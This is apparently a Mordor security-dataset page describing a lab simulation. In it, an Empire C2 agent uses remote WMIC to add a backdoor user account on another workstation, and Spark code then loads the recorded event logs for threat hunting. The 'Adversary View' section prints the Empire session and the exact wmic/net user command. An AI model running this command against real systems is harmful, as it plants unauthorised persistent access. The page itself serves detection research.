Empire Remote WMIC Add User¶
Metadata¶
Author |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2020/09/14 |
Modification Date |
2020/09/22 |
Tactics |
|
Techniques |
[‘T1047’] |
Tags |
[‘WMI IWbemServices ExecMethod’, ‘User Backdoor’] |
Dataset Description¶
This dataset represents an adversary remotely executing code via WMI to ad a backdoor user on the target system. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.
Datasets Downloads¶
Dataset Type |
Link |
---|---|
Host |
Simulation Plan¶
Environment |
Tool Type |
Module |
---|---|---|
Mordor shire |
C2 |
shell |
Adversary View¶
(Empire: agents) >
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent 6Z78CY25 checked in
[+] Initial agent 6Z78CY25 from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to 6Z78CY25 at 172.18.39.5
agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
KFL6CMNZ ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 7584 5/0.0 2020-09-14 11:33:59 http
YGBLW8EM ps 172.18.39.5 WORKSTATION5 *THESHIRE\wardog powershell 8924 5/0.0 2020-09-14 11:40:53 http
UBCKLYFA ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5412 5/0.0 2020-09-14 11:57:16 http
6Z78CY25 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 9564 5/0.0 2020-09-14 12:02:08 http
(Empire: agents) > interact 6Z78CY25
(Empire: 6Z78CY25) >
(Empire: 6Z78CY25) > shell wmic /node:WORKSTATION6 process call create "net user /add backdoor pa$$w0rd1"
[*] Tasked 6Z78CY25 to run TASK_SHELL
[*] Agent 6Z78CY25 tasked with task ID 1
(Empire: 6Z78CY25) >
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 7768;
ReturnValue = 0;
};
..Command execution completed.
(Empire: 6Z78CY25) >
Explore Mordor Dataset¶
Initialize Analytics Engine¶
from openhunt.mordorutils import *
spark = get_spark()
Download & Process Mordor File¶
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/empire_wmic_add_user_backdoor.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
Get to know your data¶
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname |Channel |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Security |5447 |1430 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |12 |1426 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |10 |1361 |
|WORKSTATION5.theshire.local|Security |5158 |1337 |
|WORKSTATION5.theshire.local|Security |5154 |1297 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |7 |1139 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |13 |1115 |
|WORKSTATION5.theshire.local|Security |4658 |534 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |10 |276 |
|WORKSTATION5.theshire.local|Security |4656 |270 |
|WORKSTATION5.theshire.local|Security |4690 |264 |
|WORKSTATION5.theshire.local|Security |4663 |257 |
|WORKSTATION5.theshire.local|Security |4703 |120 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |7 |113 |
|WORKSTATION5.theshire.local|Windows PowerShell |800 |108 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |11 |95 |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103 |90 |
|WORKSTATION5.theshire.local|Security |5156 |84 |
|WORKSTATION6.theshire.local|Security |4658 |67 |
|MORDORDC.theshire.local |Security |5156 |54 |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows